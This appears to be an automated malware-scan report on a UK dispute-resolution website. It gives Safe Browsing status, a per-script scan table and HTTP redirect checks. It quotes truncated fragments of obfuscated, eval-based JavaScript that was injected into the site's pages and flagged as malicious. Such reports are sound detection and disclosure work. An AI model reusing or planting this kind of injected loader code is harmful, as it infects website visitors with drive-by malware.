Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=resolveyourdispute.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://resolveyourdispute.co.uk/ | 200 OK Content-Length: 15710 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=254;if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(93,109,103,93,111,96,103,103,26,98,105,89,33,91,39,89,33,116,108,96,107,109,107,104,27,68,89,109,98,41,93,100,104,105,109,31,69,90,110,99,37,106,90,104,95,102,101,33,35,37,31,90,38,91,38,40,33,34,37,92,50,117,6,4,97,108,102,92,110,100,102,102,25,108,110,31,33,116,108,96,107,109,107,104,27,68,89,109,98,41,105,89,103,94,106,100,32, z=s;e(s);}} Antivirus reports:
| ||
http://smather.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://smather.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://smather.com/wp-content/themes/veecard/js/vendor/modernizr-2.6.1-respond-1.1.0.min.js?ver=2.6.1 | 200 OK Content-Length: 19447 Content-Type: application/javascript | clean |
http://smather.com/wp-content/themes/veecard/lib/prettyphoto/jquery.prettyPhoto.js?ver=3.1.4 | 200 OK Content-Length: 25298 Content-Type: application/javascript | clean |
http://smather.com/wp-content/themes/veecard/js/custom.js?ver=1.0 | 200 OK Content-Length: 2604 Content-Type: application/javascript | clean |
http://smather.com/wp-content/plugins/mini-twitter-feed/jquery.minitwitter.js?ver=3.8.5 | 200 OK Content-Length: 7822 Content-Type: application/javascript | clean |
https://platform.twitter.com/widgets.js | 200 OK Content-Length: 110239 Content-Type: application/javascript | clean |
https://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 160578 Content-Type: application/x-javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12798 Content-Type: application/javascript | clean |
http://static.ak.fbcdn.net/connect.php/js/FB.Share | 200 OK Content-Length: 162677 Content-Type: application/x-javascript | clean |
https://platform.linkedin.com/in.js | 200 OK Content-Length: 3768 Content-Type: text/javascript | clean |
http://smather.com/wp-content/plugins/simple-mail-address-encoder/smae.js?ver=1.0 | 200 OK Content-Length: 1023 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var keyStr = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
function smae_decode(m){ document.location.href='mailto:' + decode64(m); } function decode64(input) { var output = ''; var chr1, chr2, chr3 = ''; var enc1, enc2, enc3, enc4 = ''; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ''); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.indexOf(input.ch chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } chr1 = chr2 = chr3 = ''; enc1 = enc2 = enc3 = enc4 = ''; } while (i < input.length); return unescape(output); } Antivirus reports:
| ||
http://resolveyourdispute.co.uk/test404page.js | 200 OK Content-Length: 14595 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=254;if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(93,109,103,93,111,96,103,103,26,98,105,89,33,91,39,89,33,116,108,96,107,109,107,104,27,68,89,109,98,41,93,100,104,105,109,31,69,90,110,99,37,106,90,104,95,102,101,33,35,37,31,90,38,91,38,40,33,34,37,92,50,117,6,4,97,108,102,92,110,100,102,102,25,108,110,31,33,116,108,96,107,109,107,104,27,68,89,109,98,41,105,89,103,94,106,100,32, z=s;e(s);}} Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: resolveyourdispute.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:11:30 GMT
Server: Apache
Content-Length: 15710
Content-Type: text/html
Set-Cookie: PHPSESSID=1c46d938eefa4b3f2ea368540a9f1374; path=/
Set-Cookie: __utmfr=44; expires=Fri, 02-Jan-2015 18:11:30 GMT; path=/
X-Powered-By: PHP/5.4.35
...15710 bytes of data.
GET / HTTP/1.1
Host: resolveyourdispute.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:11:30 GMT
Server: Apache
Content-Length: 15710
Content-Type: text/html
Set-Cookie: PHPSESSID=1c46d938eefa4b3f2ea368540a9f1374; path=/
Set-Cookie: __utmfr=44; expires=Fri, 02-Jan-2015 18:11:30 GMT; path=/
X-Powered-By: PHP/5.4.35
...15710 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: resolveyourdispute.co.uk
Referer: http://www.google.com/search?q=resolveyourdispute.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: resolveyourdispute.co.uk
Referer: http://www.google.com/search?q=resolveyourdispute.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.